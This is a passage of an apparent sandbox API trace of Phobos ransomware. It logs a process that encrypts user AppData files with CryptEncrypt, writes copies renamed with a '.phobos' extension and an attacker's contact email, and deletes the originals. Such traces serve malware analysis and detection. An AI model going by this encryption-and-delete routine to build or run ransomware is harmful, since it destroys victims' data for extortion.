halpmcxz\\appdata\\local\\microsoft\\visio\\thumbs.dat")) returned 0x2020 [0166.699] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\thumbs.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\visio\\thumbs.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0166.699] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\thumbs.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\visio\\thumbs.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0166.699] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0166.700] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0166.700] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\thumbs.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\visio\\thumbs.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0167.353] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32c68) returned 1 [0167.353] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0167.353] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x1f400, lpOverlapped=0x0) returned 1 [0167.716] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1f410, dwBufLen=0x1f410 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1f410) returned 1 [0167.717] WriteFile (in: hFile=0x158, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1f410, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1f410, lpOverlapped=0x0) returned 1 [0167.798] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0167.798] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0167.798] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0167.798] CryptDestroyKey (hKey=0xa32d28) returned 1 [0167.798] WriteFile (in: hFile=0x158, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0167.798] CryptDestroyKey (hKey=0xa32c68) returned 1 [0167.798] CloseHandle (hObject=0x130) returned 1 [0167.798] CloseHandle (hObject=0x158) returned 1 [0167.798] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\thumbs.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\visio\\thumbs.dat")) returned 1 [0167.800] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0167.800] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Burn\\Burn\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\burn\\burn\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0167.801] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=174) returned 1 [0167.801] CloseHandle (hObject=0x158) returned 1 [0167.801] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Burn\\Burn\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\burn\\burn\\desktop.ini")) returned 0x26 [0167.801] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Burn\\Burn\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\burn\\burn\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0167.801] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Burn\\Burn\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\burn\\burn\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0167.801] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0167.801] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0167.801] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Burn\\Burn\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\burn\\burn\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0167.802] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32c68) returned 1 [0167.802] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0167.802] ReadFile (in: hFile=0x158, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xae, lpOverlapped=0x0) returned 1 [0167.803] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb0, dwBufLen=0xb0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb0) returned 1 [0167.803] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xb0, lpOverlapped=0x0) returned 1 [0167.804] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0167.804] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0167.804] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0167.804] CryptDestroyKey (hKey=0xa32d28) returned 1 [0167.804] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0167.804] CryptDestroyKey (hKey=0xa32c68) returned 1 [0167.804] CloseHandle (hObject=0x158) returned 1 [0167.804] CloseHandle (hObject=0x130) returned 1 [0167.804] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Burn\\Burn\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\burn\\burn\\desktop.ini")) returned 1 [0167.806] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0167.806] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Burn\\Burn1\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\burn\\burn1\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0167.807] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=174) returned 1 [0167.807] CloseHandle (hObject=0x130) returned 1 [0167.807] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Burn\\Burn1\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\burn\\burn1\\desktop.ini")) returned 0x6 [0167.807] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Burn\\Burn1\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\burn\\burn1\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0167.807] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Burn\\Burn1\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\burn\\burn1\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0167.808] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0167.808] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0167.808] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Burn\\Burn1\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\burn\\burn1\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0167.809] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32c68) returned 1 [0167.809] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0167.809] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xae, lpOverlapped=0x0) returned 1 [0167.810] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb0, dwBufLen=0xb0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb0) returned 1 [0167.810] WriteFile (in: hFile=0x158, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xb0, lpOverlapped=0x0) returned 1 [0167.811] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0167.811] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0167.811] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0167.811] CryptDestroyKey (hKey=0xa32d28) returned 1 [0167.811] WriteFile (in: hFile=0x158, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0167.811] CryptDestroyKey (hKey=0xa32c68) returned 1 [0167.811] CloseHandle (hObject=0x130) returned 1 [0167.811] CloseHandle (hObject=0x158) returned 1 [0167.811] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Burn\\Burn1\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\burn\\burn1\\desktop.ini")) returned 1 [0167.812] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0167.812] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Burn\\Burn2\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\burn\\burn2\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0167.814] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=174) returned 1 [0167.814] CloseHandle (hObject=0x158) returned 1 [0167.814] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Burn\\Burn2\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\burn\\burn2\\desktop.ini")) returned 0x6 [0167.815] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Burn\\Burn2\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\burn\\burn2\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0167.815] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Burn\\Burn2\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\burn\\burn2\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0167.815] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0167.815] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0167.815] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Burn\\Burn2\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\burn\\burn2\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0167.816] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32c68) returned 1 [0167.816] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0167.816] ReadFile (in: hFile=0x158, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xae, lpOverlapped=0x0) returned 1 [0167.817] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb0, dwBufLen=0xb0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb0) returned 1 [0167.817] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xb0, lpOverlapped=0x0) returned 1 [0167.818] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0167.818] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0167.818] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0167.818] CryptDestroyKey (hKey=0xa32d28) returned 1 [0167.818] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0167.818] CryptDestroyKey (hKey=0xa32c68) returned 1 [0167.818] CloseHandle (hObject=0x158) returned 1 [0167.818] CloseHandle (hObject=0x130) returned 1 [0167.818] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Burn\\Burn2\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\burn\\burn2\\desktop.ini")) returned 1 [0167.820] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0167.820] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0167.820] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=16384) returned 1 [0167.820] CloseHandle (hObject=0x130) returned 1 [0167.820] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db")) returned 0x2020 [0167.820] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0167.820] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0167.821] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0167.821] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0167.821] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0167.821] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32c68) returned 1 [0167.821] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0167.821] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x4000, lpOverlapped=0x0) returned 1 [0167.822] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x4010, dwBufLen=0x4010 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x4010) returned 1 [0167.822] WriteFile (in: hFile=0x158, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x4010, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x4010, lpOverlapped=0x0) returned 1 [0167.823] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0167.823] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0167.823] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0167.824] CryptDestroyKey (hKey=0xa32d28) returned 1 [0167.824] WriteFile (in: hFile=0x158, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0167.824] CryptDestroyKey (hKey=0xa32c68) returned 1 [0167.824] CloseHandle (hObject=0x130) returned 1 [0167.824] CloseHandle (hObject=0x158) returned 1 [0167.824] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db")) returned 1 [0167.825] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0167.825] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000016.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0167.827] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=125448) returned 1 [0167.827] CloseHandle (hObject=0x158) returned 1 [0167.827] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000016.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db")) returned 0x2020 [0167.827] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000016.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: 